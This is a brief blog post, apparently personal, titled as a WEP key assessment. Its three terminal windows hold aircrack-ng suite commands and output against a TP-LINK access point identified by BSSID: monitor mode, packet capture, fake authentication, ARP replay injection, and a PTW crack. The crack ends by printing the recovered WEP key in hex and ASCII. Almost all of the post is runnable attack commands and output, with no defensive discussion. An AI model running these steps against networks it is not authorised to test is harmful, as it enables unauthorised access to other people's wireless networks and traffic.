//
you're reading...
Linux, security, WiFi

WiFi WEP key security assessment

++++++++++++++ 1st terminal window +++++++++++++++++

#airmon-ng start wlan0

#airodump-ng –bssid D8:5D:4C:9D:AC:2D –channel 1 -w tp_link mon0

+++++++++++++++++++++++++++++++++++++++++++++

+++++++++++++++ 2nd terminal window ++++++++++++++

#aireplay-ng -1 0 -e TP-LINK_9DAC2D -a D8:5D:4C:9D:AC:2D -h 00:E0:4C:83:10:BF mon0

22:10:01  Waiting for beacon frame (BSSID: D8:5D:4C:9D:AC:2D) on channel 1

22:10:01  Sending Authentication Request (Open System) [ACK]

22:10:01  Authentication successful

22:10:01  Sending Association Request

22:10:06  Sending Authentication Request (Open System)

22:10:08  Sending Authentication Request (Open System)

22:10:10  Sending Authentication Request (Open System) [ACK]

22:10:10  Authentication successful

22:10:10  Sending Association Request [ACK]

22:10:10  Association successful 🙂 (AID: 1)

#aireplay-ng -3 -e TP-LINK_9DAC2D -a D8:5D:4C:9D:AC:2D -h 00:E0:4C:83:10:BF mon0

+++++++++++++++++++++++++++++++++++++++++++++

+++++++++++++++++3rd terminal window +++++++++++++

#time aircrack-ng *cap

Opening replay_arp-0202-215853.cap

Opening replay_arp-0202-220149.cap

Opening replay_arp-0202-220224.cap

Opening replay_arp-0202-220938.cap

Opening replay_arp-0202-221016.cap

Opening replay_src-0202-220723.cap

Opening replay_src-0202-220804.cap

Opening replay_src-0202-220838.cap

Opening replay_src-0202-220920.cap

Opening tp_link-05.cap

Read 754334 packets.

#  BSSID              ESSID                     Encryption

1  D8:5D:4C:9D:AC:2D  TP-LINK_9DAC2D            WEP (90142 IVs)

Choosing first network as target.

Opening replay_arp-0202-215853.cap

Opening replay_arp-0202-220149.cap

Opening replay_arp-0202-220224.cap

Opening replay_arp-0202-220938.cap

Opening replay_arp-0202-221016.cap

Opening replay_src-0202-220723.cap

Opening replay_src-0202-220804.cap

Opening replay_src-0202-220838.cap

Opening replay_src-0202-220920.cap

Opening tp_link-05.cap

Attack will be restarted every 5000 captured ivs.

Starting PTW attack with 91844 ivs.

KEY FOUND! [ 74:61:6B:69:73 ] (ASCII: takis )

Decrypted correctly: 100%

real    0m7.675s

user    0m4.960s

sys     0m0.263s

#

+++++++++++++++++++++++++++++++++++++++++++++

Discussion

Comments are closed.